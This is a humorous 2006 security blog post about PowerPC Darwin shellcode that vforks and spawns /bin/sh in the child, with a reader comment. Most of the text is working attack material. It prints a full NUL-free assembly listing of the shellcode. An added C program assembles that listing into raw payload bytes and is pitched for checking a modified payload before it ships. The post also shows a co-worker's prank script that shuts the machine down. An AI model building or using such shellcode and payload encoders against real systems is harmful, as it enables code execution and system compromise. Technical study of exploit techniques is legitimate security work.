On the value of clever defenses
Dino Dai Zovi | March 31st, 2006 | Filed Under: Uncategorized
My PowerPC shellcode actually forks before running the shell because I still want control of the parent process to clean up, exit the thread, or whatever. To do this compactly, both processes add r4 to the register holding the last word of the "/bin/sh" string and exec that path. After fork() or vfork() on Darwin, r3 holds the child's pid and r4 holds a flag that is 0 in the parent and 1 in the child, so the last word is built one character short and r4 completes it: the child executes "/bin/sh", while the parent ends up with a neighbouring path that does not exist ("/bin//sg" in the listing below, "/bin/si" in the variant my co-worker reacted to). Its execve() fails, and the parent continues executing the code that follows.
;;;
;;; VForking shellcode - Call vfork() and execute /bin/sh in child process.
;;; After vfork(), r4 is 0 in the parent and 1 in the child (r3 holds the pid).
;;; Both processes add r4 to the last word of the path: the child gets
;;; "/bin//sh", the parent gets "/bin//sg", whose execve() fails, so the
;;; parent runs the code that follows the execve(). No instruction below
;;; contains a NUL byte.
;;;
Lfork_execve_binsh:
        ;; call vfork (necessary to exec in threaded programs)
        li      r30, 0x42ff
        srawi   r0, r30, 8        ; r0 = 0x42ff >> 8 = 66 (SYS_vfork), with no NUL byte
        .long   0x44ffff02        ; sc (reserved bits set to avoid NULs)
        .long   0x7c842008        ; tweq r4, r4: skipped on success, traps if vfork() failed
        xor     r31, r31, r31     ; r31 = 0 terminates the path string
        lis     r30, 0x2f2f
        addi    r30, r30, 0x7367  ; r30 = "//sg"
        add     r30, r30, r4      ; r4 = 1 in the child: "//sg" + 1 = "//sh"; r4 = 0 in the parent
        lis     r29, 0x2f62
        addi    r29, r29, 0x696e  ; r29 = "/bin"
        xor     r28, r28, r28     ; r28 = NULL terminates argv
        addi    r27, r1, -12      ; r27 = argv[0] (points at its own slot)
        stmw    r27, -12(r1)      ; store r27..r31 contiguously; -12 is an arbitrary null-eliding offset
        addi    r4, r1, -12       ; r4 = argv
        addi    r3, r1, -4        ; r3 = path: "/bin" "//s?" "\0"
        xor     r5, r5, r5        ; r5 = envp = NULL
        li      r30, 30209
        srawi   r0, r30, 9        ; r0 = 30209 >> 9 = 59 (SYS_execve)
        .long   0x44ffff02        ; execve(path, argv, NULL)
Lparent:
        ;;; ... reached only when execve() fails, i.e. in the parent
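As an added example that is not part of the original post, here is a small C encoder for the listing above. It assembles the instructions, confirms that the resulting bytes are NUL-free, and models the two tricks the listing relies on: the li/srawi detour that lands 66 and 59 in r0 without a zero byte, and the "//sg" + r4 path computation. The helper names are this example's own, and the Darwin register convention (r4 = 0 in the parent and 1 in the child after vfork, pid in r3) is assumed from the platform ABI rather than taken from the post.

```c
/* Added example, not code from the original post: a minimal PowerPC encoder
 * that assembles the vfork/execve listing, checks the output for NUL bytes,
 * and models the srawi syscall-number trick and the "//sg" + r4 path trick.
 * The r4 convention (0 in the parent, 1 in the child after fork/vfork) is
 * Darwin's, assumed here; all function names are this example's own. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* D-form: op(6) | rD(5) | rA(5) | SIMM(16). */
uint32_t ppc_dform(unsigned op, unsigned rd, unsigned ra, int imm)
{
    return (op << 26) | (rd << 21) | (ra << 16) | ((uint32_t)imm & 0xffffu);
}

/* X/XO-form under primary opcode 31: rS(5) | rA(5) | rB or SH(5) | XO | Rc=0. */
uint32_t ppc_xform(unsigned rs, unsigned ra, unsigned rb, unsigned xo)
{
    return (31u << 26) | (rs << 21) | (ra << 16) | (rb << 11) | (xo << 1);
}

/* Argument order follows the assembler mnemonics (xor rA,rS,rB; srawi rA,rS,SH). */
uint32_t ppc_li(unsigned rd, int imm)                     { return ppc_dform(14, rd, 0, imm); }
uint32_t ppc_lis(unsigned rd, int imm)                    { return ppc_dform(15, rd, 0, imm); }
uint32_t ppc_addi(unsigned rd, unsigned ra, int imm)      { return ppc_dform(14, rd, ra, imm); }
uint32_t ppc_stmw(unsigned rs, unsigned ra, int d)        { return ppc_dform(47, rs, ra, d); }
uint32_t ppc_add(unsigned rd, unsigned ra, unsigned rb)   { return ppc_xform(rd, ra, rb, 266); }
uint32_t ppc_xor(unsigned ra, unsigned rs, unsigned rb)   { return ppc_xform(rs, ra, rb, 316); }
uint32_t ppc_srawi(unsigned ra, unsigned rs, unsigned sh) { return ppc_xform(rs, ra, sh, 824); }

/* Value srawi leaves in rA: arithmetic shift right (inputs here are positive). */
int32_t ppc_srawi_value(int32_t rs, unsigned sh) { return rs >> sh; }

/* Assemble the listing into big-endian bytes; returns the length, 0 if cap is too small. */
size_t assemble_fork_execve(uint8_t *out, size_t cap)
{
    const uint32_t insn[] = {
        ppc_li(30, 0x42ff),
        ppc_srawi(0, 30, 8),      /* r0 = 0x42ff >> 8 = 66 = SYS_vfork           */
        0x44ffff02u,              /* sc; reserved bits set so no byte is 0x00    */
        0x7c842008u,              /* tweq r4, r4: reached only if sc failed      */
        ppc_xor(31, 31, 31),      /* r31 = 0 terminates the path string          */
        ppc_lis(30, 0x2f2f),
        ppc_addi(30, 30, 0x7367), /* r30 = "//sg"                                */
        ppc_add(30, 30, 4),       /* + r4: "//sh" in the child, "//sg" in parent */
        ppc_lis(29, 0x2f62),
        ppc_addi(29, 29, 0x696e), /* r29 = "/bin"                                */
        ppc_xor(28, 28, 28),      /* r28 = NULL terminates argv                  */
        ppc_addi(27, 1, -12),     /* r27 = argv[0]                               */
        ppc_stmw(27, 1, -12),     /* r27..r31 stored at r1-12 .. r1+4            */
        ppc_addi(4, 1, -12),      /* r4 = argv                                   */
        ppc_addi(3, 1, -4),       /* r3 = path                                   */
        ppc_xor(5, 5, 5),         /* r5 = envp = NULL                            */
        ppc_li(30, 30209),
        ppc_srawi(0, 30, 9),      /* r0 = 30209 >> 9 = 59 = SYS_execve           */
        0x44ffff02u,              /* sc                                          */
    };
    size_t n = sizeof insn / sizeof insn[0];
    if (cap < 4 * n) return 0;
    for (size_t i = 0; i < n; i++)            /* PowerPC is big-endian */
        for (int b = 0; b < 4; b++)
            out[4 * i + b] = (uint8_t)(insn[i] >> (24 - 8 * b));
    return 4 * n;
}

int has_nul(const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] == 0) return 1;
    return 0;
}

/* The path execve() sees for a given r4, from the layout stmw leaves on the stack:
 * r29 ("/bin") at r1-4, r30 ("//sg" + r4) at r1, r31 (0) at r1+4. */
void path_for_r4(int r4, char out[9])
{
    uint32_t w[2] = { 0x2f62696eu, 0x2f2f7367u + (uint32_t)r4 };
    for (int i = 0; i < 2; i++)
        for (int b = 0; b < 4; b++)
            out[4 * i + b] = (char)(w[i] >> (24 - 8 * b));
    out[8] = '\0';
}

int main(void)
{
    uint8_t buf[128];
    char path[9];
    size_t n = assemble_fork_execve(buf, sizeof buf);

    printf("%zu bytes, NUL-free: %s\n", n, has_nul(buf, n) ? "no" : "yes");
    for (size_t i = 0; i < n; i++)
        printf("\\x%02x%s", buf[i], (i % 16 == 15 || i + 1 == n) ? "\n" : "");
    printf("li r0, 66 directly would be %08x: two NUL bytes, hence the li/srawi detour\n",
           ppc_li(0, 66));
    path_for_r4(0, path); printf("parent (r4 = 0): %s\n", path);
    path_for_r4(1, path); printf("child  (r4 = 1): %s\n", path);
    return 0;
}
```

The same encoder makes it easy to check a modified payload before it ships: change a constant, reassemble, and has_nul() tells you whether the detour is still NUL-free, while path_for_r4() shows exactly which path each side of the fork will hand to execve().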
A co-worker, who shall remain nameless, has implemented Advanced Negative-One Day Protection (TM) against me by creating a real /bin/si:
#!/bin/sh
logger -t F**KTARD "DDZ Shellcode Detector Activated"
/sbin/shutdown -h now "Security Alert: DDZ Shellcode Attempt"
Let’s see what happens when I modify my payload to add the return value of fork() to the string instead. Muihaha…(we hear the familiar “chwoung” of a mac booting in the background).
Moral of the story: Your defenses should be strong enough such that bragging about how funny they are does not render them useless.
Anonymous | April 8th, 2006 11:13 pm
It is widely acknowledged that security conflicts with many business drivers. Sometimes it's performance. Sometimes it's usability. In this case, there was the classic security / harass-your-co-worker conflict.